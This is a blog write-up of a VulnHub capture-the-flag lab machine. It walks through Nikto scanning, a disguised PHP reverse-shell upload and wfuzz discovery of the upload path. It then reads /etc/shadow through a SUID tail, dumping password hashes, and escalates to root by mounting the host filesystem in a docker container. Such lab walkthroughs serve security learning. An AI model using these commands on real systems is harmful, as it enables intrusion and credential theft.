vulnhub hackingOS writeup

https://www.vulnhub.com/entry/hackinos-1,295/

running sparta gave me port 22 and 8000, on 8000 i found a defunct wordpress. which pointed to localhost, that could be fixed with locally assigning localhost to the vm’s network ip.

i also found that Handsome_Container was a valid wordpress username. i started bruteforcing it with burp suite.

nikto revealed some interesting infos:

– Nikto v2.1.6
—————————————————————————
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 8000
+ Start Time: 2019-05-01 14:55:20 (GMT2)
—————————————————————————
+ Server: Apache/2.4.25 (Debian)
+ Retrieved x-powered-by header: PHP/7.2.15
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://192.168.56.101:8000/
+ No CGI Directories found (use ‚-C all‘ to force check all possible dirs)
+ Entry ‚/upload.php‘ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ „robots.txt“ contains 2 entries which should be manually viewed.
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header ‚link‘ found, with contents: ; rel=“https://api.w.org/“
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/hello.php: PHP error reveals file system path.
+ OSVDB-62684: /wp-content/plugins/hello.php: The WordPress hello.php plugin reveals a file system path
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: WordPress login found
+ 7919 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2019-05-01 14:56:56 (GMT2) (96 seconds)
—————————————————————————
+ 1 host(s) tested

the /upload.php is interesting, its an image upload function. i started uploading with php reverse shells infected png images. That didnt work out.

Warning: getimagesize(): PNG file corrupted by ASCII conversion in /var/www/html/upload.php on line 25
🙂

At some point i found the hint hidden in the html code <– https://github.com/fatihhcelik/Vulnerable-Machine—Hint –>
That revealed the upload.php’s code:

That makes it a lot easier. We can see that the file ist renamed to the md5 of the filename and a random number from 1-100.
The script checks the mime type of the uploaded file but no extension, allowed are gif and png mime types.

So i created a random png image with gimp and opened it with hex editor, put a a php reverse shell in it. upload wont work -.- after learning and experimenting i found a gif working like that:

cat cmd.php
GIF89a;
#

now we get to launch the shell and for that we need to find the uploaded file, so i wrote a script to create the 100 possible hashes of cmd.phpXXX

#!/usr/bin/python3

import hashlib

textToEncode = input()
bisHundert = 1
toEncode = textToEncode+str(bisHundert)

while bisHundert<=100:
print(hashlib.md5(toEncode.encode('utf-8')).hexdigest())
bisHundert += 1
toEncode = textToEncode+str(bisHundert)

$ python3 md5hackinOS_ctf.py > cmdphphashes.txt
cmd.php
thomsane@anansi:~/python$ cat cmdphphashes.txt
04292b8d46833c395942086e6ed2cd2c
d44843c7108897d25a243ffc3cd1edb7
(…)
180134430544955d54b576c726c76217

now we can supply wfuzz with the payloads stored in the textfile.

$ sudo wfuzz -w python/cmdphphashes.txt –hc 404 http://192.168.56.101:8000/uploads/FUZZ.php

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz’s documentation for more information.

********************************************************
* Wfuzz 2.3.4 – The Web Fuzzer *
********************************************************

Target: http://192.168.56.101:8000/uploads/FUZZ.php
Total requests: 100

==================================================================
ID Response Lines Word Chars Payload
==================================================================

000024: C=200 3 L 16 W 165 Ch „39b07a3be178f1249b64f60105360c4b“

Total time: 0.245449
Processed Requests: 100
Filtered Requests: 99
Requests/sec.: 407.4165

and it found our „picture“ at
http://192.168.56.101:8000/uploads/39b07a3be178f1249b64f60105360c4b.php

and my listener received the shell 🙂 which i upgraded to a real tty with python -c ‚import pty; pty.spawn(„/bin/bash“)‘ and started looking for priv esc possibilities.

i found /usr/bin/tail to have SUID bit set and tried to:
$ tail -n 100 /root/flag
Life consists of details..

well, thats not a flag right? but no permission error either since cat: /root/flag: Permission denied

tail -c1G /etc/shadow
root:$6$qoj6/JJi$FQe/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvEVYcL1bWSrF3XTVTF91n60yUuUMUcP65EgT8HfjLyjGHova/:17951:0:99999:7:::
daemon:*:17931:0:99999:7:::
bin:*:17931:0:99999:7:::
sys:*:17931:0:99999:7:::
sync:*:17931:0:99999:7:::
games:*:17931:0:99999:7:::
man:*:17931:0:99999:7:::
lp:*:17931:0:99999:7:::
mail:*:17931:0:99999:7:::
news:*:17931:0:99999:7:::
uucp:*:17931:0:99999:7:::
proxy:*:17931:0:99999:7:::
www-data:*:17931:0:99999:7:::
backup:*:17931:0:99999:7:::
list:*:17931:0:99999:7:::
irc:*:17931:0:99999:7:::
gnats:*:17931:0:99999:7:::
nobody:*:17931:0:99999:7:::
_apt:*:17931:0:99999:7:::

enumerating further i found $ cat /etc/init.d/delete.sh
cat /etc/init.d/delete.sh
#!/bin/bash

while [ 1 ]
do
rm -rf /var/www/html/uploads/*.php
sleep 300
done

okay…that was the fuck keeping burp suite intruder from finding the file because of the speed throtteling in the free edition. -.-

cat wp-config.php
dumpall.sql

LOCK TABLES `host_ssh_cred` WRITE;
/*!40000 ALTER TABLE `host_ssh_cred` DISABLE KEYS */;
INSERT INTO `host_ssh_cred` VALUES (‚hummingbirdscyber‘,’e10adc3949ba59abbe56e057f20f883e‘);
/*!40000 ALTER TABLE `host_ssh_cred` ENABLE KEYS */;
UNLOCK TABLES;

INSERT INTO `wp_users` VALUES (1,’Handsome_Container‘,’$P$BXJ8ZmtYd5lHZOLPgTccLUhaQLxm0L0′,’handsome_container‘,’pupetofosu@ask-mail.com‘,“,’2019-02-23 15:49:54′,“,0,’Handsome_Container‘);

hummingbirdscyber
e10adc3949ba59abbe56e057f20f883e md5 of 123456
hummingbirdscyber@vulnvm:~$

well, well, well…i was on a container before! i noticed when i looked in /var/www/html and only found an index.html. i was thinking so when i was looking on the mounts on the container…

[+] Current User
hummingbirdscyber

[+] Current User ID
uid=1000(hummingbirdscyber) gid=1000(hummingbirdscyber) groups=1000(hummingbirdscyber),4(adm),24(cdrom),30(dip),46(plugdev),113(lpadmin),128(sambashare),129(docker)

ok, we are in the docker group…so basically root already.

lets look what containers run

hummingbirdscyber@vulnvm:~$ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
252fa8cb1646 ubuntu "/bin/bash" 2 months ago Up 2 days brave_edison
1afdd1f6b82c wordpress:latest "docker-entrypoint.s…" 2 months ago Up 2 days 0.0.0.0:8000->80/tcp experimental_wordpress_1
81a93420fd22 mysql:5.7 "docker-entrypoint.s…" 2 months ago Up 2 days 3306/tcp, 33060/tcp experimental_db_1

since i run the vulnerable vm without internet access for security reasons, i used the ubuntu image which already exists to elevate my privileges

hummingbirdscyber@vulnvm:~$ docker run -v /:/hostOS -i -t ubuntu

now we run a a new container and the / filesystem of the main host is mounted to /hostOS

root@c50ed36b8d25:/hostOS/root# cat flag

Congratulations!

                              -ys-                                                               
                                /mms.                                                            
                                  +NMd+`                                                         
                               `/so/hMMNy-                                     
                                 `+mMMMMMMd/           ./oso/-                           
                                  `/yNMMMMMMMMNo`   .`   +-                   
                                  .oyhMMMMMMMMMMN/.     o.                  
                                    `:+osysyhddhs`    `o`                  
                                     .:oyyhshMMMh.   .:                      
                                  `-//:. `:sshdh: `                         
                                             -so:.                           
                                            .yy.                              
                                          :odh                            
                                        +o--d`                 
                                      /+. .d`                           
                                    -/`  `y`                                  
                                  `:`   `/                                    
                                 `.     `

that was fun 🙂 <3

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.